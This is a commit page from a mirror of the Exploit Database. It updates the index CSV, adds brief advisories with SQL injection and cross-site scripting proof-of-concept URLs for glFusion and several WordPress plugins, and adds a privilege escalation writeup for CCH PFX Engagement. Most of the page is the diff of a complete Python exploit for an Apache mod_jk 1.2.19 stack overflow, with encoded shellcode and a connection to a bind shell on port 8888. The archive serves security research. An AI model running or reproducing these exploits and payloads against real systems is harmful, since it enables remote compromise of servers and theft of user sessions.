bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 11_29_2014

Browse source
This commit is contained in:
Offensive Security 2014-11-29 04:53:44 +00:00
parent 9195172fad
commit 5a1a7a312a
8 changed files with 246 additions and 179 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
files.csv
View file

@ -5711,7 +5711,7 @@ id,file,description,date,author,platform,type,port
6097,platforms/php/webapps/6097.txt,"Artic Issue Tracker 2.0.0 (index.php filter) SQL Injection Vulnerability",2008-07-17,QTRinux,php,webapps,0
6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.1.0.4 (index.php page) SQL Injection Vulnerability",2008-07-18,Mr.SQL,php,webapps,0
6099,platforms/php/webapps/6099.txt,"Siteframe (folder.php id) Remote SQL Injection Vulnerability",2008-07-18,n0ne,php,webapps,0
6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)",2008-07-18,Unohope,windows,remote,80
6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 - Remote Buffer Overflow Exploit (win32)",2008-07-18,Unohope,windows,remote,80
6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Preauth DoS Exploit",2008-07-19,"Joxean Koret",multiple,dos,0
6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 (show.php) Remote SQL Injection Vulnerability",2008-07-20,Mr.SQL,php,webapps,0
6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow PoC",2008-07-21,"Guido Landi",windows,dos,0
@ -31873,4 +31873,8 @@ id,file,description,date,author,platform,type,port
35385,platforms/php/webapps/35385.pl,"Slider Revolution/Showbiz Pro Shell Upload Exploit",2014-11-26,"Simo Ben Youssef",php,webapps,80
35386,platforms/linux/remote/35386.txt,"Logwatch Log File Special Characters Local Privilege Escalation Vulnerability",2011-02-24,"Dominik George",linux,remote,0
35387,platforms/php/webapps/35387.txt,"phpShop 0.8.1 'page' Parameter Cross Site Scripting Vulnerability",2011-02-25,"Aung Khant",php,webapps,0
35388,platforms/php/webapps/35388.txt,"WordPress HTML 5 MP3 Player with Playlist Plugin - Full Path Disclosure",2014-11-27,"KnocKout inj3ct0r",php,webapps,0
35391,platforms/php/webapps/35391.txt,"glFusion 1.1.x/1.2.1 'users.php' SQL Injection Vulnerability",2011-02-25,H3X,php,webapps,0
35392,platforms/php/webapps/35392.txt,"WordPress IGIT Posts Slider Widget Plugin 1.0 'src' Parameter Cross Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35393,platforms/php/webapps/35393.txt,"WordPress ComicPress Manager Plugin 1.4.9 'lang' Parameter Cross Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35394,platforms/php/webapps/35394.txt,"WordPress YT-Audio Plugin 1.7 'v' Parameter Cross Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35395,platforms/windows/local/35395.txt,"CCH Wolters Kluwer PFX Engagement <= 7.1 - Local Privilege Escalation",2014-11-28,"Information Paradox",windows,local,0

Can't render this file because it is too large.

32
platforms/php/webapps/35388.txt
View file

@ -1,32 +0,0 @@
WordPress - (Html5 Mp3 Player with Playlist) Plugin <= Full Path Disclosure
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com
[~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor,
DaiMon, PRoMaX, ZoRLu, ( milw00rm.com )
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~App. : WordPress - (html5-mp3-player-with-playlist) Plugin
|~Software: https://wordpress.org/plugins/html5-mp3-player-with-playlist/
|~Software: https://github.com/wp-plugins/html5-mp3-player-with-playlist/tree/master/html5plus
|~Vulnerability Style : FULL PATH DISCLOSURE
|[~]Date : "26.11.2014"
|[~]Tested on : Kali Linux, Windows 7
|DORK: inurl:html5plus/html5full.php
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
==============[Exploitation]===============================
http://[VICTIM]/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php

10
platforms/php/webapps/35391.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/46575/info
glFusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The vendor refutes this issue stating it can not be exploited as described.
http://www.example.com/user.php?mode=1 and substring(version(),1,1)=4
http://www.example.com/user.php?mode=1 and substring(version(),1,1)=5

9
platforms/php/webapps/35392.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46589/info
The IGIT Posts Slider Widget plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
IGIT Posts Slider Widget plugin 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/igit-posts-slider-widget/timthumb.php?src=%3Cscript%3Ealert(0)%3C/script%3E

9
platforms/php/webapps/35393.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46590/info
The ComicPress Manager plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ComicPress Manager 1.4.9.2 and 1.4.9.9 are vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/comicpress-manager/jscalendar-1.0/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C%2fscript%3E&submitted=

9
platforms/php/webapps/35394.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46591/info
The YT-Audio plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
YT-Audio plugin 1.7 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/yt-audio-streaming-audio-from-youtube/frame.php?v=%22%3E%3C/iframe%3E%3Cscript%3Ealert(0)%3C%2fscript%3E%3Ciframe+src=%22

58
platforms/windows/local/35395.txt Executable file
View file

@ -0,0 +1,58 @@
# Exploit Title: CCH Wolters Kluwer PFX Engagement <= v7.1 Local Privilege
Escalation
# Date: 11/26/14
# Exploit Author: singularitysec@gmail.com
# Vendor Homepage: www.cchgroup.com
# Version: PFX Engagement <= v7.1
# Tested on: Windows XP -> Windows 8, 2003, 2008, 2012
# CVE : 2014-9113
Product Affected:
CCH Wolters Kluwer PFX Engagement <= v7.1
This vulnerability has been reference checked this against multiple
installs. This configuration was identical across all systems and each
version encountered.
Executables/Services:
Pfx.Engagement.WcfServices
PFXEngDesktopService
PFXSYNPFTService
P2EWinService
Attack Detail:
The PFX services for engagement install with LOCAL SYSTEM service
credentials in the directory C:\PFX Engagement\
[image: Inline image 1]
The executables that are installed, by default, allow AUTHENTICATED USERS
to modify, replace or alter the file. This would allow an attacker to
inject their code or replace the executable and have it run in the context
of the system.
[image: Inline image 2]
This would allow complete compromise of a machine on which it was
installed, giving the process LOCAL SYSTEM access to the machine in
question. An attacker can replace the file or append code to the
executable, reboot the system or restart the service and it would then
compromise the machine. As LOCAL SYSTEM is the highest privilege level on
a machine, this allows total control and access to all parts of the system.
This affects both the server and workstation builds.
Remediation:
Remove the modify/write permissions on the executables to allow only
privileged users to alter the files.
Apply vendor patch when distributed.
Vulnerability Discovered: 11/26/2014
Vendor Notified: 11/26/2014
Vendor states this will be patched with next software update.
Website: www.information-paradox.net
This vulnerability was discovered by singularitysec@gmail.com. Please
credit the author in all references to this exploit.

290
platforms/windows/remote/6100.py
View file

@ -1,145 +1,145 @@
#!/usr/bin/python
#
# _____ _ _ _____ _____ _____ _____
# / ___| |_| | _ \| _ | _ |_ _|
# | (___| _ | [_)_/| (_) | (_) | | |
# \_____|_| |_|_| |_||_____|_____| |_|
# C. H. R. O. O. T. SECURITY GROUP
# - -- ----- --- -- -- ---- --- -- -
# http://www.chroot.org
#
# _ _ _ _____ ____ ____ __ _
# Hacks In Taiwan | |_| | |_ _| __| | \| |
# Conference 2008 | _ | | | | | (__| () | |
# |_| |_|_| |_| \____|____|_|\__|
# http://www.hitcon.org
#
#
# Title =======:: Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit
#
# Author ======:: unohope [at] chroot [dot] org
#
# IRC =========:: irc.chroot.org #chroot
#
# ScriptName ==:: Apache Module mod_jk/1.2.19
#
# Vendor ======:: http://tomcat.apache.org/
#
# Download ====:: http://archive.apache.org/dist/tomcat/tomcat-connectors/jk/binaries/win32/
#
# Tested on ===:: Apache/2.0.58 (Win32) mod_jk/1.2.19
# Apache/2.0.59 (Win32) mod_jk/1.2.19
#
# Greets ======:: zha0
#
#
# [root@wargame tmp]# ./apx-jk_mod-1.2.19
# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
#
# usage: ./apx-jk_mod-1.2.19 <host>
#
# [root@wargame tmp]# ./apx-jk_mod-1.2.19 192.168.1.78
# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
#
# [+] connecting to 192.168.1.78 ...
#
# Trying 192.168.1.78...
# Connected to 192.168.1.78.
# Escape character is '^]'.
# Microsoft Windows XP [.. 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\AppServ\Apache2>
#
#
import os, sys, time
from socket import *
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68"
shellcode += "\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32"
shellcode += "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43"
shellcode += "\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71"
shellcode += "\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c"
shellcode += "\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74"
shellcode += "\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66"
shellcode += "\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c"
shellcode += "\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b"
shellcode += "\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79"
shellcode += "\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54"
shellcode += "\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36"
shellcode += "\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30"
shellcode += "\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66"
shellcode += "\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73"
shellcode += "\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b"
shellcode += "\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63"
shellcode += "\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a"
shellcode += "\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f"
shellcode += "\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73"
shellcode += "\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c"
shellcode += "\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70"
shellcode += "\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61"
shellcode += "\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33"
shellcode += "\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32"
shellcode += "\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e"
shellcode += "\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39"
shellcode += "\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39"
shellcode += "\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e"
shellcode += "\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e"
shellcode += "\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51"
shellcode += "\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64"
shellcode += "\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37"
shellcode += "\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70"
shellcode += "\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e"
shellcode += "\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73"
shellcode += "\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61"
shellcode += "\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78"
shellcode += "\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e"
shellcode += "\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30"
shellcode += "\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b"
shellcode += "\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b"
shellcode += "\x4f\x69\x46\x4b\x4f\x6e\x30\x68";
foo_base = 8
buf_base = 4087
buf_offset = foo_base * 11
nop = "\x90"
ret = "\xcc\x2a\xd9\x77"
buf = nop*foo_base + shellcode + nop*(buf_base - foo_base - len(shellcode) - buf_offset) + ret
buf += "\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3" + nop*(buf_offset - foo_base - 3)
def usage():
print 'usage: %s <host>\n' % sys.argv[0]
sys.exit(-1)
def xpl():
try:
print len(buf)
sockaddr = (host, 80)
s = socket(AF_INET, SOCK_STREAM)
s.connect(sockaddr)
payload = buf + 'HTTP/1.0\r\nHost: %s\r\n\r\n\0' % host
s.send('GET /' + payload)
s.close()
print ' [+] connecting to %s ...\n' % host
time.sleep(3)
os.system("telnet %s 8888" % host)
except:
print ' [-] EXPLOIT FAILED!\n'
if __name__ == '__main__':
print 'Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope [at] chroot.org)\n'
try:
host = sys.argv[1]
except IndexError:
usage()
xpl()
# [NOTE]
#
# !! This is just for educational purposes, DO NOT use for illegal. !!
#
# milw0rm.com [2008-07-18]
#!/usr/bin/python
#
# _____ _ _ _____ _____ _____ _____
# / ___| |_| | _ \| _ | _ |_ _|
# | (___| _ | [_)_/| (_) | (_) | | |
# \_____|_| |_|_| |_||_____|_____| |_|
# C. H. R. O. O. T. SECURITY GROUP
# - -- ----- --- -- -- ---- --- -- -
# http://www.chroot.org
#
# _ _ _ _____ ____ ____ __ _
# Hacks In Taiwan | |_| | |_ _| __| | \| |
# Conference 2008 | _ | | | | | (__| () | |
# |_| |_|_| |_| \____|____|_|\__|
# http://www.hitcon.org
#
#
# Title =======:: Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit
#
# Author ======:: unohope [at] chroot [dot] org
#
# IRC =========:: irc.chroot.org #chroot
#
# ScriptName ==:: Apache Module mod_jk/1.2.19
#
# Vendor ======:: http://tomcat.apache.org/
#
# Download ====:: http://archive.apache.org/dist/tomcat/tomcat-connectors/jk/binaries/win32/
#
# Tested on ===:: Apache/2.0.58 (Win32) mod_jk/1.2.19
# Apache/2.0.59 (Win32) mod_jk/1.2.19
#
# Greets ======:: zha0
#
#
# [root@wargame tmp]# ./apx-jk_mod-1.2.19
# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
#
# usage: ./apx-jk_mod-1.2.19 <host>
#
# [root@wargame tmp]# ./apx-jk_mod-1.2.19 192.168.1.78
# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
#
# [+] connecting to 192.168.1.78 ...
#
# Trying 192.168.1.78...
# Connected to 192.168.1.78.
# Escape character is '^]'.
# Microsoft Windows XP [.. 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\AppServ\Apache2>
#
#
import os, sys, time
from socket import *
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68"
shellcode += "\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32"
shellcode += "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43"
shellcode += "\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71"
shellcode += "\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c"
shellcode += "\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74"
shellcode += "\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66"
shellcode += "\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c"
shellcode += "\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b"
shellcode += "\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79"
shellcode += "\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54"
shellcode += "\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36"
shellcode += "\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30"
shellcode += "\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66"
shellcode += "\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73"
shellcode += "\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b"
shellcode += "\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63"
shellcode += "\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a"
shellcode += "\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f"
shellcode += "\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73"
shellcode += "\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c"
shellcode += "\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70"
shellcode += "\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61"
shellcode += "\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33"
shellcode += "\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32"
shellcode += "\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e"
shellcode += "\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39"
shellcode += "\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39"
shellcode += "\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e"
shellcode += "\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e"
shellcode += "\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51"
shellcode += "\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64"
shellcode += "\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37"
shellcode += "\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70"
shellcode += "\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e"
shellcode += "\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73"
shellcode += "\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61"
shellcode += "\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78"
shellcode += "\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e"
shellcode += "\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30"
shellcode += "\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b"
shellcode += "\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b"
shellcode += "\x4f\x69\x46\x4b\x4f\x6e\x30\x68";
foo_base = 8
buf_base = 4087
buf_offset = foo_base * 11
nop = "\x90"
ret = "\xcc\x2a\xd9\x77"
buf = nop*foo_base + shellcode + nop*(buf_base - foo_base - len(shellcode) - buf_offset) + ret
buf += "\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3" + nop*(buf_offset - foo_base - 3)
def usage():
print 'usage: %s <host>\n' % sys.argv[0]
sys.exit(-1)
def xpl():
try:
print len(buf)
sockaddr = (host, 80)
s = socket(AF_INET, SOCK_STREAM)
s.connect(sockaddr)
payload = buf + 'HTTP/1.0\r\nHost: %s\r\n\r\n\0' % host
s.send('GET /' + payload)
s.close()
print ' [+] connecting to %s ...\n' % host
time.sleep(3)
os.system("telnet %s 8888" % host)
except:
print ' [-] EXPLOIT FAILED!\n'
if __name__ == '__main__':
print 'Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope [at] chroot.org)\n'
try:
host = sys.argv[1]
except IndexError:
usage()
xpl()
# [NOTE]
#
# !! This is just for educational purposes, DO NOT use for illegal. !!
#
# milw0rm.com [2008-07-18]